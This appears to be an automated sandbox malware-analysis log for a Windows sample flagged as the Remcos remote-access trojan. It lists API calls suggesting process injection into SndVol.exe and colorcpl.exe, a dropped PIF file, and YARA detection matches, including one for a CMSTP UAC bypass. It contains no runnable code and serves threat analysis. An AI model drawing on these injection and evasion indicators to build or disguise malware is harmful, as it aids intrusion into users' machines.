Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C67A2A NtAllocateVirtualMemory, 0_2_02C67A2A
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C6DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile, 0_2_02C6DBB0
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C68D6E GetThreadContext,SetThreadContext,NtResumeThread, 0_2_02C68D6E
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C68D70 GetThreadContext,SetThreadContext,NtResumeThread, 0_2_02C68D70
Source: C:\Users\Public\Libraries\Selebzih.PIF Code function: 10_2_02ABB118 GetModuleHandleW,NtOpenProcess,IsBadReadPtr,IsBadReadPtr,GetModuleHandleW, 10_2_02ABB118
Source: C:\Users\Public\Libraries\Selebzih.PIF Code function: 10_2_02AB7D78 NtWriteVirtualMemory, 10_2_02AB7D78
Source: C:\Users\Public\Libraries\Selebzih.PIF Code function: 10_2_02ABDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose, 10_2_02ABDD70
Source: C:\Users\Public\Libraries\Selebzih.PIF Code function: 10_2_02ABDBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 10_2_02ABDBB0
Source: C:\Users\Public\Libraries\Selebzih.PIF Code function: 10_2_02ABDC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose, 10_2_02ABDC8C
Source: C:\Users\Public\Libraries\Selebzih.PIF Code function: 10_2_02ABDC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 10_2_02ABDC04
Source: C:\Users\Public\Libraries\Selebzih.PIF Code function: 10_2_02AB8D6E Toolhelp32ReadProcessMemory,Thread32Next,GetThreadContext,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Toolhelp32ReadProcessMemory,Heap32ListFirst,SetThreadContext,NtResumeThread,Thread32Next, 10_2_02AB8D6E
Source: C:\Users\Public\Libraries\Selebzih.PIF Code function: 10_2_02AB8D70 Toolhelp32ReadProcessMemory,Thread32Next,GetThreadContext,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Toolhelp32ReadProcessMemory,Heap32ListFirst,SetThreadContext,NtResumeThread,Thread32Next, 10_2_02AB8D70
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_077EE33D NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA, 15_2_077EE33D
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C78128 CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess, 0_2_02C78128
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_291467EF ExitWindowsEx,LoadLibraryA,GetProcAddress, 8_2_291467EF
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress, 15_2_004167EF
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_077E750C ExitWindowsEx,LoadLibraryA,GetProcAddress, 15_2_077E750C
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C520C4 0_2_02C520C4
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_0445950D 8_2_0445950D
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_044546F4 8_2_044546F4
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_0445869B 8_2_0445869B
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_0446E766 8_2_0446E766
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_044487F4 8_2_044487F4
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_0445F068 8_2_0445F068
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_044740C8 8_2_044740C8
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_0444814B 8_2_0444814B
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_0445F2C5 8_2_0445F2C5
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_04458283 8_2_04458283
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_04456C08 8_2_04456C08
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_0445EC0A 8_2_0445EC0A
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_04434D22 8_2_04434D22
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_04457D87 8_2_04457D87
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_0445EE39 8_2_0445EE39
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_04474EF6 8_2_04474EF6
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_0443FEA8 8_2_0443FEA8
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_04458F05 8_2_04458F05
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_04466F8D 8_2_04466F8D
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_0444895D 8_2_0444895D
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_0443E910 8_2_0443E910
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_04458AD0 8_2_04458AD0
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_04447BBC 8_2_04447BBC
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_2916797E 8_2_2916797E
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_291639D7 8_2_291639D7
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_2914DBF3 8_2_2914DBF3
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_2917DA49 8_2_2917DA49
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_29157AD7 8_2_29157AD7
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_29167DB3 8_2_29167DB3
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_29157C40 8_2_29157C40
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_29156E9F 8_2_29156E9F
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_2916DEED 8_2_2916DEED
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_29165EEB 8_2_29165EEB
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_2916E11C 8_2_2916E11C
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_2914F18B 8_2_2914F18B
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_291841D9 8_2_291841D9
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_291681E8 8_2_291681E8
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_29144005 8_2_29144005
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_2916706A 8_2_2916706A
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_2916E34B 8_2_2916E34B
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_291833AB 8_2_291833AB
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_29176270 8_2_29176270
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_29167566 8_2_29167566
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_2916E5A8 8_2_2916E5A8
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_2915742E 8_2_2915742E
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_291687F0 8_2_291687F0
Source: C:\Users\Public\Libraries\Selebzih.PIF Code function: 10_2_02AA20C4 10_2_02AA20C4
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0043706A 15_2_0043706A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_00414005 15_2_00414005
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0043E11C 15_2_0043E11C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_004541D9 15_2_004541D9
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_004381E8 15_2_004381E8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0041F18B 15_2_0041F18B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_00446270 15_2_00446270
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0043E34B 15_2_0043E34B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_004533AB 15_2_004533AB
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0042742E 15_2_0042742E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_00437566 15_2_00437566
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0043E5A8 15_2_0043E5A8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_004387F0 15_2_004387F0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0043797E 15_2_0043797E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_004339D7 15_2_004339D7
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0044DA49 15_2_0044DA49
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_00427AD7 15_2_00427AD7
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0041DBF3 15_2_0041DBF3
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_00427C40 15_2_00427C40
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_00437DB3 15_2_00437DB3
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_00435EEB 15_2_00435EEB
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0043DEED 15_2_0043DEED
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_00426E9F 15_2_00426E9F
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_077F87F4 15_2_077F87F4
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0781E766 15_2_0781E766
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0780869B 15_2_0780869B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_078046F4 15_2_078046F4
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0780950D 15_2_0780950D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_07808283 15_2_07808283
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0780F2C5 15_2_0780F2C5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_077F814B 15_2_077F814B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_078240C8 15_2_078240C8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0780F068 15_2_0780F068
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_07816F8D 15_2_07816F8D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_07808F05 15_2_07808F05
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_07824EF6 15_2_07824EF6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0780EE39 15_2_0780EE39
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_077EFEA8 15_2_077EFEA8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_07807D87 15_2_07807D87
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_077E4D22 15_2_077E4D22
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_07806C08 15_2_07806C08
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0780EC0A 15_2_0780EC0A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_077F7BBC 15_2_077F7BBC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_07808AD0 15_2_07808AD0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_077F895D 15_2_077F895D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_077EE910 15_2_077EE910
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 00402093 appears 50 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 0780551E appears 40 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 00434801 appears 41 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 00401E65 appears 34 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 077D2B82 appears 34 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 00434E70 appears 54 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 07805B8D appears 54 times
Source: C:\Windows\SysWOW64\SndVol.exe Code function: String function: 0445551E appears 40 times
Source: C:\Windows\SysWOW64\SndVol.exe Code function: String function: 29131E65 appears 34 times
Source: C:\Windows\SysWOW64\SndVol.exe Code function: String function: 29164E70 appears 54 times
Source: C:\Windows\SysWOW64\SndVol.exe Code function: String function: 04422B82 appears 34 times
Source: C:\Windows\SysWOW64\SndVol.exe Code function: String function: 29132093 appears 50 times
Source: C:\Windows\SysWOW64\SndVol.exe Code function: String function: 04455B8D appears 54 times
Source: C:\Windows\SysWOW64\SndVol.exe Code function: String function: 29164801 appears 41 times
Source: C:\Users\Public\Libraries\Selebzih.PIF Code function: String function: 02AA4860 appears 683 times
Source: C:\Users\Public\Libraries\Selebzih.PIF Code function: String function: 02AB894C appears 50 times
Source: C:\Users\Public\Libraries\Selebzih.PIF Code function: String function: 02AA46D4 appears 155 times
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: String function: 02C689D0 appears 45 times
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: String function: 02C6894C appears 56 times
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: String function: 02C544DC appears 74 times
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: String function: 02C54500 appears 33 times
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: String function: 02C54860 appears 949 times
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: String function: 02C546D4 appears 244 times
Source: jlPBMMQbXC.exe Binary or memory string: OriginalFilename vs jlPBMMQbXC.exe
Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs jlPBMMQbXC.exe
Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs jlPBMMQbXC.exe
Source: jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9F7000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs jlPBMMQbXC.exe
Source: jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9E0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs jlPBMMQbXC.exe
Source: jlPBMMQbXC.exe, 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs jlPBMMQbXC.exe
Source: jlPBMMQbXC.exe, 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs jlPBMMQbXC.exe
Source: jlPBMMQbXC.exe, 00000000.00000002.1630792872.000000007F388000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameReadIcon.exe\ vs jlPBMMQbXC.exe
Source: jlPBMMQbXC.exe, 00000000.00000003.1555406818.000000000E444000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs jlPBMMQbXC.exe
Source: jlPBMMQbXC.exe, 00000000.00000003.1386950607.000000007FCDF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs jlPBMMQbXC.exe
Source: jlPBMMQbXC.exe, 00000000.00000002.1638986421.000000007FB20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs jlPBMMQbXC.exe
Source: jlPBMMQbXC.exe, 00000000.00000003.1555406818.000000000E473000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs jlPBMMQbXC.exe
Source: jlPBMMQbXC.exe, 00000000.00000002.1577348813.0000000002435000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs jlPBMMQbXC.exe
Source: jlPBMMQbXC.exe, 00000000.00000000.1382432413.0000000000487000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameReadIcon.exe\ vs jlPBMMQbXC.exe
Source: jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs jlPBMMQbXC.exe
Source: jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs jlPBMMQbXC.exe
Source: jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs jlPBMMQbXC.exe
Source: jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs jlPBMMQbXC.exe
Source: jlPBMMQbXC.exe Binary or memory string: OriginalFilenameReadIcon.exe\ vs jlPBMMQbXC.exe
Source: jlPBMMQbXC.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.SndVol.exe.442191d.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.SndVol.exe.442191d.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.SndVol.exe.442191d.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.2.colorcpl.exe.77d0000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 15.2.colorcpl.exe.77d0000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.colorcpl.exe.77d0000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.2.colorcpl.exe.77d191d.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 15.2.colorcpl.exe.77d191d.2.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.colorcpl.exe.77d191d.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.SndVol.exe.4420000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.SndVol.exe.4420000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.SndVol.exe.4420000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.SndVol.exe.29130000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.SndVol.exe.29130000.2.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.SndVol.exe.29130000.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.SndVol.exe.4420000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.SndVol.exe.4420000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.SndVol.exe.4420000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.2.colorcpl.exe.77d191d.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 15.2.colorcpl.exe.77d191d.2.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.colorcpl.exe.77d191d.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.SndVol.exe.442191d.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.SndVol.exe.442191d.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
